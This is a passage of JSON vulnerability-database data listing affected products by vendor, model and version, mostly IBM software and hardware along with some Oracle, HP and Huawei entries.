"eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.7" }, { "model": "moonshot", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "e9000 chassis v100r001c00spc230", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "u200s and cs (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "smartcloud orchestrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "flashsystem 9848-ac1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "emptoris services procurement", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.6.1" }, { "model": "abyp-2t-0s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.21" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.50" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.0" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.12.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.80" }, { "model": "powervc express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.4" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "rational tau interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "sterling control center ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.41" }, { "model": "virtual fabric 10gb switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.6.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "oceanstor v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18800" }, { "model": "operations manager for windows", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.3" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.3" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.4" }, { "model": "flashsystem 9846-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.0" }, { "model": "websphere appliance management center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "security key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22279160" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.3" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7100" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.071" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "service manager software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.32" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.11" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.12" }, { "model": "data server runtime client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "9500e (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.3" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.22" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "msr20 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.2" }, { "model": "os image for aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "security proventia network multi-function security system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flex system chassis management module 2pet10q", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "operations manager for linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.21" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.4" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.032" }, { "model": "infosphere discovery for zos", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "cognos controller fp1 if1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.45" }, { "model": "infosphere optim query workload tuner for db2 for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system networking rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.1.0" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "db2\u00ae connect? unlimited edition for system i\u00ae", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.8" }, { "model": "bladecenter js22", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-61x)0" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.35" }, { "model": "websphere mq", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "jrockit r28.0.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere integration developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "hp830 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.21" }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.43" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "93x5)0" }, { "model": "sparc enterprise m8000 xcp", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "1121" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.1" }, { "model": "java jre 1.6.0 37", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "abyp-0t-4s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079440" }, { "model": "bladecenter js23", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x)0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.32" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.012" }, { "model": "4800g (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.7" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.52" }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "tivoli network manager ip edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "netiq sentinel", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "7.3.3" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x571430" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.210" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.22" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.14.0" }, { "model": "smartcloud provisioning fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.15" }, { "model": "powervc express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.2" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "algo credit limits", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7.0" }, { "model": "asset manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.40" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "java se embedded 8u6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.5" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.72" }, { "model": "xiv management tools", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.14" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.3" }, { "model": "notes and domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.19" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.13" }, { "model": "data server driver for odbc and cli", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.37" }, { "model": "tivoli netcool impact", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.31" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.045" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.5" }, { "model": "jrockit r27.6.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "java sdk sr16-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "data server runtime client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "sametime community server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.303" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.20" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "content collector for sap applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "jrockit r27.6.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "powervc express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087330" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.4" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.90" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.024" }, { "model": "flex system chassis management module 2pet12k", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "service manager software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.34" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "db2\u00ae advanced workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.3" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.20" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.23" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.7" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.00" }, { "model": "db2\u00ae purescale? feature for enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.8" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.02" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.71" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.10" }, { "model": "propel", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.01" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.16.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.11" }, { "model": "release control 9.21p2", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.029" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "websphere real time", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.1" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "s7700 v200r003c00spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "abyp-10g-2sr-2lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "db2 enterprise server edition fp6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "java sdk 7r1 sr2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.13" }, { "model": "integration adaptor", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.12" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.9" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.23" }, { "model": "infosphere biginsights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363073770" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "flex system chassis management module 2pet10p", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "operations agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.14" }, { "model": "jrockit r28.3.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "operations manager for unix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.21" }, { "model": "linux enterprise module for legacy software", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.11" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "infosphere identity insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "tivoli storage productivity center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.8" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.21" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.2" }, { "model": "flex system chassis management module 2pet12d", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "tivoli netcool configuration manager if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.6003" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.010" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.41" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.027" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.022" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.12" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "sterling connect:direct browser ifix10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2" }, { "model": "policy center v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor vis6600t v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.2" }, { "model": "power systems 350.d0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "data studio client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "flex system chassis management module 2peo12r", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.5" }, { "model": "system networking rackswitch g8264-t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "oceanstor s5600t v200r002c20spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.212" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.79" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "emptoris sourcing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1.1" }, { "model": "rational agent controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "sparc enterprise m4000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", 